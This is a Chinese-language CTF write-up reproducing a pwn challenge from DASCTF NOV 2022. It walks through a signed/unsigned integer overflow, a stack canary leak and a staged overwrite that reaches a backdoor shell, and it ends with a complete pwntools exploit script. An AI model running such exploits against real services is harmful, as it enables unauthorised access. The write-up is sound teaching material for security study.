DASCTF NOV X联合出题人2022年度积分榜争夺赛PWN复现

原文地址:

DASCTF NOV X联合出题人2022年度积分榜争夺赛PWN复现

签个到

image

居然是没开NX的,而且还有一个可写可执行的段

image

静态分析:

image

进入get()可以看到：循环中如果heap[i] + 4LL处的内容与我们送入内容的前8字符相同，且送入内容+8地址处的内容(即canary)与heap[i]处的前8字符相同，即可进入后门

image

image

add(16,b'aaaaaaaa')
get(b'aaaaaaaa')

随便调试看看

image

image

image

read_len():

image

read_con():

image

sla('power length: ',0)
#以0来利用整型溢出漏洞,下面进行栈溢出

int与unsigned int比较时，在linux下int会默认被强制转换为unsigned int类型再进行比较，所以a与b比较的时候，a会自动转换成unsigned int类型进行比较。由于负的signed int的最高位(符号位)是1，转换成unsigned int之后，就会变成一个很大的unsigned int型正数

可以进行很多次的read(0,&buf,1uLL)

sla('> ',add_idx)
sla('power length: ',0)
ru('name: ')

image

pl=b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
#var_10 heap_size 保持原来的堆块
#var_8 canary后半段

image

sla('> ',add_idx)
sla('power length: ',8)
ru('name: ')

image
可以看到第二次add时2c0处是canary后半段而不是00000886

pl = p32((canary>>32)&0xffffffff)+b"aaaa"
li('(canary>>32)&0xffffffff) = '+hex((canary>>32)&0xffffffff))
s(pl)

image

choice(get_idx)
ru('data: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
sl(pl)

比较后getshell

image

image

image

image

最终的exp:

#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
from ctypes import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *

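context.os = 'linux'
context.arch = 'amd64'
#context.arch = 'i386'
context.log_level = "debug"

name = './pwn'

# Author's convention: debug = 1 talks to the remote instance, debug = 0
# spawns the local binary. Kept as-is so the rest of the script is unchanged.
debug = 0
if debug:
    p = remote('172.52.16.218', 9999)
else:
    p = process(name)

libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './libc-2.31.so'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)


def _as_bytes(data):
    """Return *data* unchanged when it is already bytes, otherwise str(data).

    The original helpers called str() on every argument; for a bytes payload
    that yields the text "b'...'" and puts the wrong bytes on the wire. Ints
    and str are converted exactly as before, so existing calls are unaffected.
    """
    if isinstance(data, (bytes, bytearray)):
        return bytes(data)
    return str(data)


# Thin tube wrappers; every send/recv in the script goes through these.
s = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(_as_bytes(delim), _as_bytes(data))
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(_as_bytes(delim), _as_bytes(data))
r = lambda num: p.recv(num)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
itr = lambda: p.interactive()
# Pad a short leak to 4/8 bytes before unpacking. The fill must be bytes:
# bytes.ljust() raises TypeError on a str fill character (uu32 had '\x00').
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))
# Read up to a pointer's top byte (0x7f on amd64, 0xf7 on i386) and unpack
# the trailing bytes as the address.
l64 = lambda: u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
l32 = lambda: u32(p.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
# Coloured console markers (orange / red) for the author's progress output.
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

# Menu option numbers passed to choice(). The names come from the author's
# generic template; in this script delete_idx is used for the "get" action.
add_idx = 1
delete_idx = 2
show_idx = 4
edit_idx = 3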

def dbg():
    """Attach gdb to the running target process and block until resumed."""
    target_pid = proc.pidof(p)[0]
    gdb.attach(target_pid)
    pause()

bss = elf.bss()

# Canary leak via the "who are u?" prompt: nine 'a' bytes are sent, the reply
# is read up to the echoed "aaaaaaaa", and the next 8 bytes are unpacked as
# the canary. The ninth 'a' (0x61) overlaps the canary's lowest byte, so it
# is subtracted back out (presumably that byte is the canary's NUL; confirm
# against the binary).
ru('who are u?\n')
s(b'a' * 9)

ru('aaaaaaaa')
raw_canary = p.recv(8)
canary = uu64(raw_canary) - 0x61
li(hex(canary))

def choice(cho):
    """Answer the program's '> ' menu prompt with option number *cho*."""
    menu_prompt = '> '
    sla(menu_prompt, cho)

def add(size, con):
    """Menu option add_idx: answer 'power length: ' with *size*, then 'name: ' with *con*.

    *con* is sent with sendline, i.e. with a trailing newline.
    """
    prompts = {'length': 'power length: ', 'name': 'name: '}
    choice(add_idx)
    sla(prompts['length'], size)
    ru(prompts['name'])
    sl(con)

def get(data):
    """Menu option delete_idx (the "get" action here): send *data* after 'data: '.

    *data* goes out raw via send(), without a trailing newline.
    """
    choice(delete_idx)
    ru('data: ')
    s(data)

# Both halves of the leaked canary are needed below; compute them once.
canary_lo = canary & 0xffffffff
canary_hi = (canary >> 32) & 0xffffffff

# Stage 1: add with length 0. Per the write-up this length passes the
# signed/unsigned comparison and the name read overruns. The payload is 0x14
# filler bytes, the value the author notes as keeping the original chunk
# (var_10 / heap size), then the low half of the canary (var_8).
sla('> ', add_idx)
sla('power length: ', 0)
ru('name: ')
stage1 = b"a" * 0x14 + p64(0x0000000000020d51) + p32(canary_lo)
li('canary&0xffffffff = ' + hex(canary_lo))
sl(stage1)

# Stage 2: add with length 8. High half of the canary plus four filler bytes,
# sent raw (no newline).
sla('> ', add_idx)
sla('power length: ', 8)
ru('name: ')
stage2 = p32(canary_hi) + b"aaaa"
li('(canary>>32)&0xffffffff) = ' + hex(canary_hi))
s(stage2)

# Stage 3: the "get" comparison receives the same 8 bytes, this time with a
# trailing newline (sendline), then drop to the interactive shell.
choice(delete_idx)
ru('data: ')
sl(stage2)

itr()

 
